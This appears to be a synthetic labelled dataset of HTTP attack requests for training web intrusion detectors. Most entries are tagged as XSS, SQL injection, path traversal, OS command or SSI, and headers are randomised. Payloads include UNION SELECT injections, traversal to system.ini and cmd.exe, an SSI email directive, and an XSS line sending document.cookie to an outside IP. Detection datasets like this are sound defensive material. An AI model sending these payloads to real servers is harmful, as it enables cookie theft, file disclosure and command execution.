GET /bq9tmtg0cbtkchnpn/ttaaahen5tbet/C./4Remieeisfsouaforae/rI-52/sKy1x-M-/tvNAyu4iwi/1IA79a5g/tRKbEZ/POk/dgV_OOhm/ba.cgi?aa=5631&Rshutdownlsudivkdlx7=sk&97pahohn6ze=8roqln&5rtSoSoh=%3Bc&weAjefmWpoEqj=ait%3A&C@_6=s%7Et%3B&nnn=amimnrv7yeh41&Tn9Nv4hn=ni&crhdw8Isdcadeas=a&oia=83087629&olI4resoo=et74mgqyisnh&et2=etitm&trer6hyx=zenu&wbgsound1af0uO4v9wget=6857141&toae=niabaodrc HTTP/1.1
Host: www.Tereir.org:2
Connection: close
Accept: audio/basic;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: lmiohaco-itioere, sq-jjsM;q=0.6
Cache-Control: 6ato=fehn
Client-ip: 42.40.149.55
Cookie: dHaWaotaolahlsC=02279;fea28O=ia;boot.inimailrZ=25731673;QlogaV3o=dwreuO;rtisT6aeenu=lgipeaprocessing-instructiondl Rde
Cookie2: $Version="6"
Date: Fri, 25 Feb 05 18:39:37 GMT
ETag: "lhhbnWrQchRflpNLMz"
Expect: rgtepa
If-Modified-Since: Wed, 09 Jul 08 03:25:29 CET
If-Unmodified-Since: Mon, 17 Nov 08 23:46:33 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 070
Pragma: no-cache
Proxy-Authorization: NTLM aTZ0cnJ1cmtlaTNpdG5lZHlobm5kbzlJdzQyYWloYWRvYW91YWVpZG5oczNhdA==
Authorization: tNibo 65strte=wstshs
Referer: /nanhnn.pl
TE: trailers
Trailer: Expect
User-Agent: '     group  by  users.id  having  977=977
UA-Color: color8
Via: tiuatn/1.7 223.2.56.222:1635
Transfer-Encoding: compress
X-Serial-Number: 290003
----: --------------------------------

null

End - Id: 35090
Start - Id: 46660
class: XSS
GET /Dnrizhj6aayF0efyoij/flSothudCnathdos/6H3Z5QSQHPup9Mr_F2/tbyaeiteraee/jhXUXc0kJ@MX/rf@UJXDfivn9FBg9yH/wPDyL2linkIstylei/sdRytmw-m@Jzd/PGru/RP.css?iqeaaauda0=124&timcetne0sdspue=755 HTTP/1.0
Host: 42.6.22.179:68
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ifD-4k;q=0.0, ea3-sTmcr7, 0oaT-sayede, d-5, kat8-den5e
Cache-Control: max-age=39
Client-ip: 223.137.186.92
Cookie: nlr2t=<div   style= "    binding:    url([http://www.itde.com/script/2ataTksoLf.mspx]); "  >;a0iskhn=ieeinhntdTrYlbei;tasuw9f=etbq;shgni=2h/a
Cookie2: $Version="1"
Date: Thu, 06 Mar 08 21:45:13 CET
ETag: W/"ZD.Iq1qblXH9eMI10Ly"
Expect: hlrCrjf
From: yn4r7n2@oAtirnF.biz
If-Modified-Since: Thu, 10 Sep 09 22:19:50 UTC
If-Unmodified-Since: Sun, 23 Jan 05 03:48:37 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Gwh7 oehnsd=LeflJer
Authorization: Basic Z21waWlpdjpub3JrdA==
Range: 403830-16,093-
Referer: http://hmsebpah.st/haue/eoou/rMeeDe/TheLhn/g0ausea.txt
TE: deflate;q=0.8
Trailer: Max-Forwards
User-Agent: r8nleqi (iej539B; nYOMsenyd)
UA-CPU: PowerPC
UA-OS: WinNT
UA-Color: color16
Via: 1.9 246.134.118.229, 4.8 35.52.242.66
Transfer-Encoding: wiIhtm
Upgrade: 0hi/0.1, sdpair/3.6
Warning: 466 152.152.48.226 "ecjo" 
X-Serial-Number: 64753281
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46660
Start - Id: 44501
class: OsCommanding
GET /scripts/georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: www.aSteahert.it
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-turkish, shift_jis, iso-10646-ucs-2
Accept-Encoding: compress;q=0.9, identity, gzip, deflate, identity;q=0.2
Accept-Language: dtsdut-niaiss
Cache-Control: max-age=5
Client-ip: 245.96.181.37
Cookie: laNufng=k;9gusrrj-.=eoqesnxary9f;utg=79;wfa4beV7B=rnio?olania
Cookie2: $Version="88"
Date: Fri, 10 Jun 05 14:40:56 CET
ETag: "IUVO4qgAnfRz99rZqxh"
Expect: sfshsaRs=urgyr;h087du=rtocyehe
From: trtanl@hpchnnll.de
If-Modified-Since: Mon, 10 May 04 10:11:48 CET
If-Unmodified-Since: Mon, 23 Aug 04 12:39:02 UTC
If-Match: *
If-None-Match: "3owuL_Pw4tI2EKGv6k"
If-Range: *
Max-Forwards: 278
MIME-Version: 8.2
Pragma: wd=vaec
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: Basic TlVhcjpzbWhpYUhydA==
Range: -80,3-,-9028
Referer: /erhago/3uhs/itys/tems8/unytN.asp
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 2.4; tg-tn; rv:6.4.1) Gecko/32043651
UA-CPU: Sparc
UA-Disp: 715,347,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 455x841
Via: 5.1 www.sneoe.jpeg:846
Transfer-Encoding: identity
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44501
Start - Id: 44949
class: PathTransversal
GET /ij6./VC2U0bgsoundIjYiframeyjkktelnet.tiff?i4andlH6ihae4s=04473518&ehomehoeerp5ota=+miheuni&olduh=doc%28+++file%3A%2F%2F%2Fc%3A%2FwnsEw%2Forr.xml+++%29&lsoUah=5mN&ttetll=%29otn&mi5owiaeSxq=31&2peeea2hsdxGjSs=0qc%5C&ewdEi7ieeMa=hs%7CS2esi6aa+o%26&3jzTu0rD=ueoecEeae&euwsinzg=Akwsat%3Dcn9sn&sn=%25u%5De&pnibth=05381680 HTTP/1.1
Host: 45.238.108.29
Connection: OsZwhe
Accept: */*
Accept-Charset: iso-8859-6, x-mac-chinesetrad, windows-874, ks_c_5601-1987;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: *
Client-ip: 165.201.34.93
Cookie: nfiasmit2nRS=ku;lh=85497284;hheP2ogbei=ae7gUaI;xmcz=eX1DW2IlZ-;airi=divgroup byaahagmSh;pe6nh4ireg=74792752
Cookie2: $Version="089"
Date: Thu, 14 Jan 10 11:42:50 UTC
ETag: W/"eXLaXWzgwViq5Mu"
If-Unmodified-Since: Sun, 17 Jul 05 01:50:46 CET
If-Range: *
Max-Forwards: 8
Referer: http://www.c2seN.com/3eoNhif.asmx
User-Agent: bdissnaujb8s4
UA-CPU: StrongARM
Via: 6.2 242.177.92.240:076
Transfer-Encoding: compress
Warning: 890 89.223.20.139:8441 "dEo8yE4ioSfe6tTu6" 

null

End - Id: 44949
Start - Id: 47403
class: XSS
GET /otlawecrdti/fEn69oWNoBWven.css?taltElsdxnyos9=Taiiee%28deYw2&dr=%3Besock_stream&o0Tx=ngrcp%40wr%27saa6%26sei&Uv=298556&ttiatgmg7koee=Hneme&D0Kv21ni_=9904717225&eecoshtflrttlE=74690&bNet=aabnutvareu&spwnrxioTt3xo54=0KlqzkQ-&mereenf=3677&iZrrelhhqgSibc=%3Am&Itwda=%3Cinput+type++%3D%22+++image+++%22+++dynsrc+++%3D++++%22javascript%3A%5Bwindow.open%28%27http%3A%2F%2F45.38.88.254%2Fonroll.mspx%27%2Bdocument.cookie%29%3B%5D+++%22+++%3E&Z5KIivbscriptjJU4=7303&YCxbetweenwget=ya6nslrcy&r8eld=hBzig HTTP/1.1
Host: www.2rwolo.st:80
Connection: close
Accept: audio/basic, text/plain;q=0.8, image/png
Accept-Charset: windows-1251;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 162.119.135.49
Cookie: hsiaepnd=e94l;oiai9l8cun5Niee=gLmjg5qWo0;isbaRoegee=qcwi6I9aeT
Cookie2: $Version="57"
Date: Sat, 02 May 09 03:22:52 CET
ETag: "xslHmXI@16wFajcv"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Fri, 27 Mar 09 24:17:48 UTC
If-Unmodified-Since: Tue, 31 Mar 09 05:53:42 UTC
If-Match: *
If-None-Match: "Jcoz8eEx4bFjMYp"
If-Range: Sun, 01 Nov 09 02:51:13 GMT
Max-Forwards: 0
MIME-Version: 0.3
Pragma: inlgbsth=yrl8b
Proxy-Authorization: Digest realm
Authorization: Basic ZWVpbzpDSGt6N3R0aw==
Range: 3529-807061,329-36,-0646
Referer: http://DhtteTx.gov/2iI2e/tlem/ms9d3tat.nsf
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/1.6 (compatible; MSIE 3.4; Solaris; nYhtv)
UA-CPU: StrongARM
UA-Disp: 815,562,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1670x058
Via: HTTP/4.9 83.108.112.70, TiEa/1.4 www.s0efd.jpeg:4799, HTTP/5.1 44.102.156.190
Transfer-Encoding: identity
Upgrade: sEtli/1.4, eqt/6.4, eixu/1.5
Warning: 420 47.114.190.11 "tisyat2nhQero" 
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 981746915
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47403
Start - Id: 41916
class: SqlInjection
GET /o0S5av4x5aYI.I.I7/dteteF2t9e4esnfETo6h/ntrmac0oHgltg/ezH/7.T@fconnect%u7mjechowNwT/C6J0xp_MvUaKP.jpeg?tngasardgo=phpa&wYHh=%27%29+++UN%2F**%2FION+++++ALL+++SEL%2F**%2FECT+++++%27ehntoen%27%2C76%2C392%2C%27aeeoneAae%27%2C9+FROM+osxe7ar+++++WHERE+++++%28+++%27%27++%3D%27&304essscfgh=gibAt0l8b&OFWRv.K=aHtyfwPvaT9k&pm2z=4950&TpsantaS=torlsam5uber%7Clfromrr%3Csa&1oihEeqtsOeb0=2&ktli=rpi4eoouemo HTTP/1.1
Host: 140.147.120.74:22622
Connection: 7iseh
Accept: audio/*, application/zip;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=49170
Client-ip: 21.123.50.241
Cookie: esr=e&nlejsoin;ZgUXrK0dFyYQxml=tt2cttnoh;wtssidtHhiu=iavwnpelUcains;2rhawweAj=py-svrd;noEselectn=mtcattg7hCeuito1e
Cookie2: $Version="8"
Date: Wed, 15 Jun 05 18:35:19 CET
ETag: "MLO5o.MWGTcwAKH2E"
Expect: 100-continue
From: PtDlsore@tsfosgnuwd.be
If-Modified-Since: Wed, 09 Apr 08 01:18:03 UTC
If-Unmodified-Since: Wed, 27 Jul 05 06:35:45 GMT
If-Match: "goGjbVh2jWqePEZQ@QBg"
If-None-Match: *
If-Range: *
Max-Forwards: 2674
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic Z250RmVlOmVlaG9scnll
Authorization: nini Hync=6Ipcvma
Range: -0
Referer: /aRt8tnd/ef0e8/nisto7.asmx
TE: gzip
Trailer: Via
User-Agent: Mozilla/7.3 (compatible; MSIE 2.2; Win 9x; dwuate)
UA-CPU: Sparc
UA-Disp: 421,960,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9010x724
Via: ncsa/7.4 119.155.181.203, HTTP/2.4 11.194.61.13, c3Lu/3.5 www.aaeifd.css:5
Transfer-Encoding: 0dFe; fwLlo=trea3eht
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 206 www.hpaefstE.jpg "2ytytu1" "Wed, 13 Sep 06 14:39:38 GMT"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41916
Start - Id: 45466
class: PathTransversal
GET /unn3Rl1ehhstdt4ehi/qX7IX-tCiruZmailL/fzrVYfi@./hwscriptaccess_logul8Y0z/hgwieeeyr19/shemtalllmyrdeei/cCPYnlaSCLlG-/1rpUS.mdb?oea9t=eFc08j3A1&Ntbikvuruehs=eti5n&fsYE=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat HTTP/1.0
Host: 39.157.27.111
Connection: close
Accept: audio/basic
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, gzip, compress, gzip;q=0.3, deflate
Accept-Language: meuatwR-sai;q=0.0, eaugh-D, Xa3snwh-puoygsh;q=0.9, gn4tnw-c;q=0.1, mlsrh-eddSeeu;q=0.8
Cache-Control: ne6e='hthef'
Client-ip: 104.75.30.146
Cookie: hFfinsert=6513;8eedpe=68381;AbsgpLpe=wIp5whwWientstdingf;5sean4eum2o=06;n9WdOHRr8=40775
Cookie2: $Version="526"
Date: Fri, 08 May 09 21:53:22 CET
ETag: "MWQpBPOD6G9PQ6YY5D"
Expect: 100-continue
From: eso4Aae@o0ky0.it
If-Modified-Since: Tue, 16 Sep 08 10:32:29 CET
If-Unmodified-Since: Mon, 16 Nov 09 13:43:56 UTC
If-Match: *
If-None-Match: *
If-Range: "tUgWF8Y-xOGVIERHN-"
Max-Forwards: 408
Pragma: nnc=a
Proxy-Authorization: Digest algorithm=ohi4
Authorization: ianw cFnsazM=HpFt
Range: -23,7962-,63876-540949
Referer: /4plr/Ts4t5tAc/krocqqp/oehc/Sw8cfT.conf
TE: deflate,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: uvcwsSntosjinucerd
UA-CPU: Sparc
UA-Disp: 1778,2316,8
UA-OS: Win98
UA-Color: color8
Via: 09qO/9.5 211.128.59.21:72, 1ndlst/2.9 www.gja9h.shtml, 9.4 14.157.145.218
Transfer-Encoding: compress
Upgrade: drf/1.3, eoe/9.9
Warning: 016 www.lea2ce.html "yMifIhorneae" 
X-Forwarded-For: 93.18.219.115
X-Serial-Number: 1049963497967
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45466
Start - Id: 43789
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.dimhRcphod.gov
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-8-i
Accept-Encoding: gzip;q=0.6, gzip, gzip;q=0.9, identity;q=0.6, deflate;q=0.9
Accept-Language: *;q=0.3
Cache-Control: max-stale=34
Client-ip: 96.0.65.19
Cookie: bgin7im=asl"apacsdrop"atO/ 
Cookie2: $Version="730"
Date: Sun, 22 Jan 06 04:48:02 UTC
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: eOrde=mEgiaao
From: qto7read@r8owxth.de
If-Modified-Since: Sun, 30 Mar 08 11:56:33 UTC
If-Unmodified-Since: Mon, 02 Feb 04 23:52:49 UTC
If-Match: *
If-None-Match: "X0vDchMuUzzbLnZ"
If-Range: Thu, 28 Apr 05 19:22:49 CET
Max-Forwards: 6908
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: NTLM ZmxlYXN1dXJhYU12b25ob25mQm5JYWVzbHR0bmlhYXNoNnVyZw==
Authorization: pTeest obeyj=ge1a
Range: 904036-,02113-35,44499-
Referer: /einpdM/6cq6cHo/feya/tekgnn/ttodd.mspx
TE: trailers,trailers,deflate;q=0.9
Trailer: Pragma
User-Agent: Mozilla/1.4 (Windows; U; Win98 5.1; ej-en; rv:4.3.3) Gecko/16664348
UA-CPU: Sparc
UA-Disp: 911,7505,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 697x813
Via: FTP/7.1 www.sh0d1g.htm, Essss/1.4 www.c1Ribwb.html
Transfer-Encoding: identity
Upgrade: tEYegn/9.0, l5aur/2.0, tbef/0.2, 8mru/4.2, Nsq/6.6
Warning: 460 www.n9Mes.jpeg:02263 "Eetoalsmogtatnc" 
X-Forwarded-For: 203.135.237.55
X-Serial-Number: 055444693738
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43789
Start - Id: 39295
class: SSI
GET /rndC0Z9KuTv/e@/vvIlg9ilnfinuur.bin?oheu=qNjoennaalaomdep&nhNhueleetrt=oeklAenaeDst&formnjw=%3C%21--%23email+fromhost%3D%22www.edOecct.com%22+tohost%3D%22mailbox.afr9.com%22+message%3D%22tnahl+7hsbf1S+ide+lou%22+fromaddress%3D%22eRlREt.com%22+toaddress%3D%2233o.elT.com%22+subject%3D%22NO%22+sender%3D%22yned.com%22+replyto%3D%225uOth.com%22+cc%3D%22b1i%22+inreplyto%3D%22nlc+82Sr+npnc%22+id%3D%22b2a7mail%22+--%3E&dm=a8lrd&JSAYiframeyfe4wT=udrtz4ooe&DhuYsse3hScsxw=paS&aqd3ppaoUe2erl=fwoeagbthsTto&shhakgcy=prtw&eotayehiw=ea-cH%3F+e1%3El%3E&febocttLece=mDve&pith=4&j33r7bhgni=6990376&giodietps=AhaphA2sa HTTP/1.0
Host: 134.101.99.46:21
Connection: close
Accept: text/*, image/*;q=0.8, video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: a=gl70sb
Client-ip: 178.60.27.113
Cookie: tm=e4eim
Cookie2: $Version="390"
Date: Tue, 23 Jan 07 01:52:02 UTC
ETag: W/"jsr.W0L@rVg50t8d"
Expect: 100-continue
From: unmiie@Hyivtsn.com
If-Modified-Since: Thu, 31 Jan 08 11:47:45 GMT
If-Unmodified-Since: Sun, 29 Mar 09 17:57:44 GMT
If-Match: *
If-None-Match: "Ohb_@MSYNk.0vicdi"
If-Range: Thu, 16 Dec 04 20:00:28 CET
Max-Forwards: 6
MIME-Version: 6.8
Pragma: ieyern=w
Proxy-Authorization: Basic N3NzZ21vbG86bnUzaQ==
Authorization: Basic Z3NyZWE6dHRiQWFu
Range: 7-228,-05193
Referer: /Iaslf.tar.gz
TE: trailers,deflate;q=0.6
Trailer: Expect
User-Agent: cis9c5nl0s/3.0.0.2.2
UA-CPU: Sparc
UA-Disp: 646,7509,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 573x190
Via: HTTP/8.7 www.lins5.gif, 9.7 www.yle0anc.png:2
Transfer-Encoding: compress
Upgrade: m0oet/4.8
Warning: 220 149.222.61.240 "icibtopbtoQts" "Tue, 05 Apr 05 10:07:37 UTC"
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 80952053828136219
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39295
Start - Id: 44835
class: PathTransversal
GET /Vraccess_logsconnectki9o/ttuk1jIIQP/rufnEhjaT/osxmbu6oornptf/uEmkgi/lzHtf0ulxixl3wnbx.bin?1eti0eg=file%3A%2F%2F%2Fe%3A%2Frroi%2FexIo%2FverEtec.xml HTTP/1.1
Host: www.iHIesth6.gov
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: compress;q=0.8, gzip;q=0.3
Accept-Language: 9-9omr, 2npdro0-t, by0hC-0;q=0.3, 1dlho-iietd
Cache-Control: min-fresh=6903
Client-ip: 203.89.41.237
Cookie: id=0t?aSy2akv3m;Efhnnc3hhe=59921497;Grtgtarj=nyoolocation;es=okG;aEszb=l:httve
Cookie2: $Version="41"
Date: Fri, 19 Mar 10 10:10:17 UTC
ETag: W/"1jGtoTUskEbXDpBL"
Expect: 100-continue
From: eosehi@IsoiaSe.uk
If-Modified-Since: Sun, 07 Jun 09 04:15:13 CET
If-Unmodified-Since: Sat, 25 Nov 06 19:15:51 UTC
If-Match: "_F5cy_Ape-PYI7E2EApc"
If-None-Match: "1PzXibVCPnYO-bO"
If-Range: Sun, 17 Apr 05 14:17:59 CET
Max-Forwards: 294
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM cnRhZ25sYWlscmNrMzQweWRwdG9jYW9zZWx0cGVubXZp
Authorization: Basic aGVlcjdyOm9rd3Nz
Range: 4-,8-56742
Referer: /anIflPso/hulJC/eeEan.mdb
TE: trailers,trailers,trailers
Trailer: From
User-Agent: 0ezwf/7.3
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 035x248
Via: HTTP/8.1 www.oltonEs.html, HTTP/2.9 www.cccs.shtml, 8.6 217.230.68.190
Transfer-Encoding: deflate
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 479 www.eao96f.png "ldeigihLwAo78oeint" "Mon, 21 Dec 09 20:16:29 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 13064
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44835
Start - Id: 42194
class: SqlInjection
GET /formZpDflikeN7/s0vbnisptxmL/ehhn.bin?fjld=78&EipdaZeiuy=lruiutd2orcloek&8mldwreji=pb&odsjoo=+OR+++++2++%3E++++1&lshutdownautoexec_UMElni@=assJatts&teo=4467707 HTTP/1.0
Host: www.xtdhpnnjr.de
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.8, deflate;q=0.9, deflate;q=0.7, deflate;q=0.5, deflate
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 137.86.250.225
Cookie: ah=totamxetH;Ojdal=et9asestmdoNmt;o7iIr=aVOUJAkXi5vP;parei2=ucdDfIs9zDZa;Lmr=(t
Cookie2: $Version="346"
Date: Sun, 25 Sep 05 19:26:24 GMT
ETag: W/"mDVvfRc_ydIMiZa"
Expect: irpp0=cI1o9hea;esvtet
From: bnR1@rhaYn.be
If-Modified-Since: Fri, 21 Oct 05 02:29:51 GMT
If-Unmodified-Since: Sat, 07 Feb 09 24:31:16 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7466
MIME-Version: 4.5
Pragma: e0='miaas'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest nc=D9Efa2bf
Range: -3,97623-
Referer: /eaoE/tune.rar
TE: chunked;q=0.2,chunked;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.1 (X11; U; Open BSD i586 6.6; rs-dn; rv:7.3.9) Gecko/11169022
UA-CPU: StrongARM
UA-Disp: 466,6159,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 124x5537
Via: FTP/9.6 91.64.8.25
Transfer-Encoding: gzip
Upgrade: ji40ad/7.5, ednwes/8.3, osi/1.7, eor/7.9
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 52.218.75.150
X-Serial-Number: 746787770668949
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42194
Start - Id: 42267
class: SqlInjection
GET /t_/na099p0.avK/owuEwInK@ZQcZAclDZd/oq3sntleec/dc60.sh?lsrH7oeT=221842619&HAjTperlu=%27+++%29+UNION+++ALL++SELECT++sc3auW++++FROM+Yy35++++WHERE+%28+%27%27++%3D++%27&te=neaefV HTTP/1.0
Host: 62.255.52.67:80
Connection: close
Accept: audio/x-wav;q=0.9, text/*;q=0.9
Accept-Charset: utf-7, iso-8859-5;q=0.2, iso-10646-ucs-2, iso-8859-15, x-mac-japanese
Accept-Encoding: deflate;q=0.7, gzip, gzip, compress
Accept-Language: nf-nqelre;q=0.6, l-eairrsys, ilistt-eeT, qlinonal-0mostxs
Cache-Control: max-stale=7
Client-ip: 241.101.146.87
Cookie: intf=am.i_vv;aoinlyr4=55;brh=n\3~;tgi=540155;nslr=t20D.oF
Cookie2: $Version="64"
Date: Wed, 17 Jan 07 03:09:33 UTC
ETag: "cQI1KzijYNcy.dQfk"
Expect: u69omi=hocA
From: eethwr@T5iivnsieh.be
If-Modified-Since: Sat, 10 Jun 06 06:07:52 GMT
If-Unmodified-Since: Mon, 12 Jul 04 13:53:34 GMT
If-Match: "EQygxceatCHPYE@EizCP"
If-None-Match: "djfZ8SFe3-yzcmVix"
If-Range: Fri, 13 Aug 04 17:33:19 GMT
Max-Forwards: 485
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: Basic bGRoTGVncjpvamlu
Range: 996351-59792
Referer: /b4jH/hhtsang/ae6uoee6/t3eewcw.html
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/9.8 (Machintosh; U; Mac OS X 7.4; sq-lg; rv:2.5.8) Gecko/94503779
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0775x379
Via: FTP/9.7 166.205.20.231, 5.3 86.160.126.93:7
Transfer-Encoding: gb3e; rszmuo=qeq9hR
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 301 34.243.209.148:30161 "olzejaFnho9ieieodT" "Fri, 02 Jan 09 11:48:48 CET"
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 280200406213
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42267
Start - Id: 45671
class: PathTransversal
GET /sEhaaarsercdrdrhe/21uunionMzdmQ@processing-instructionT/i77FAM1qvZ/nOXKSl5I3Mb8z/knhncmsrfrbouZ2aM/rhfAWFS.pl?elja=ee&aheEeaOssdh=58351675&otcehixbleAaee=5281622889&itF3td=iwa%3Fcl&eeat9emt=eQv_Faw3&gdn=nax&lieu=hn3Lt%24rlfwhereheoa&lehnft4=hXhepug5Rb&ovni=7spdt7oymti&mtrthbeie0nA2=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&hcogiraeCItss=37408093&hyl=Actt&W@OwZfd1EW.A=agDsHGJ.Nt HTTP/1.1
Host: www.oieijsopoo.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: o3se9-Wdtlo;q=0.1, omohkw9-es6co3t, airhs-8tzm
Cache-Control: max-age=9
Client-ip: 10.24.0.201
Cookie: iairNtt=nehtqT;eelicieao2zr=iyyD90ch;rposrdk6pemlen=>;Bai0f3e5no=sn;e;lsoeia2idqi0Ee=2a6B
Cookie2: $Version="5"
Date: Sat, 18 Feb 06 01:11:54 UTC
ETag: W/"9Gws14@SKbE5N.A"
Expect: 100-continue
From: nerbc@c9tot8nhs.cz
If-Modified-Since: Tue, 29 Mar 05 22:23:19 UTC
If-Unmodified-Since: Mon, 19 Apr 10 09:44:19 CET
If-Match: "hHkbkBmiYuc-XI.Frg"
If-None-Match: *
If-Range: Sun, 13 Dec 09 12:39:02 UTC
Max-Forwards: 43
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="vhio"
Authorization: ow9V eoqAdp7m=elEsrjii
Range: 64940-,112-
Referer: /niriu3ee.swf
TE: chunked;q=0.7,trailers
Trailer: User-Agent
User-Agent: lafItrs/6.6.7.7
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x430
Via: FTP/7.1 240.186.209.6, FTP/5.9 www.teitf.tiff
Transfer-Encoding: 09ej
Upgrade: au3/0.3, DRlrd/5.7
Warning: 919 39.60.125.239 "tNiraeetkgrwRtoiNs" 
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: ----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 45671
Start - Id: 46041
class: PathTransversal
GET /0VI_aNL/kneDzDak.emO@xDuq3p/e7KsofSS5_qFPMnoEoYZ/hP7r.jpeg?eesidn=989583&ztninnjd=0&hdSsotso9lph=pauaayheh&fzvabdeIm=ibNdR4XehfK5&oeueEy3tt=700&sfyb3ntbHlL=272&XJUk=1a&Dw=lsieteoylamie&wer8ntsdeahy=gDVyp1vh&eidryizetiatsT=eri&8meEcodaa=u9L&nsretl=%3Bt2a%3CeL&mTF0uSPTqZdocument5=4213&hDaatq=7&iLdqk=tnloseMacQHt HTTP/1.1
Host: www.Jeiee.it
Connection: keep-alive
Accept: text/*;q=0.7
Accept-Charset: x-mac-greek
Accept-Encoding: /etc/httpd/httpd.conf
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 69.63.68.40
Cookie: da=5860985;uofelkeh3ng=nK1;amwH=aSX9.a
Cookie2: $Version="112"
Date: Mon, 02 Aug 04 21:00:10 UTC
ETag: W/"zdRw8CqfUmKMJ.WhyZnf"
Expect: na2smeai
From: t8eatheo@nnmabyy.org
If-Modified-Since: Sat, 09 Feb 08 06:22:20 CET
If-Unmodified-Since: Sun, 02 Nov 08 18:10:53 GMT
If-Match: *
If-None-Match: "YqpCAnBsdPILs-RwmLR"
If-Range: Mon, 12 Sep 05 21:51:43 CET
Max-Forwards: 62
MIME-Version: 2.8
Pragma: no-cache
Authorization: Basic dXFsbXJ0OnJ1bENXcDd0
Range: 96418-,-1,193-
Referer: /ttn5d/meigt0l/eiie.wav
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: i6DBQu5CG http://www.dor5.biz
UA-OS: Windows NT
UA-Pixels: 376x6038
Via: HTTP/9.4 219.123.168.145
Transfer-Encoding: identity
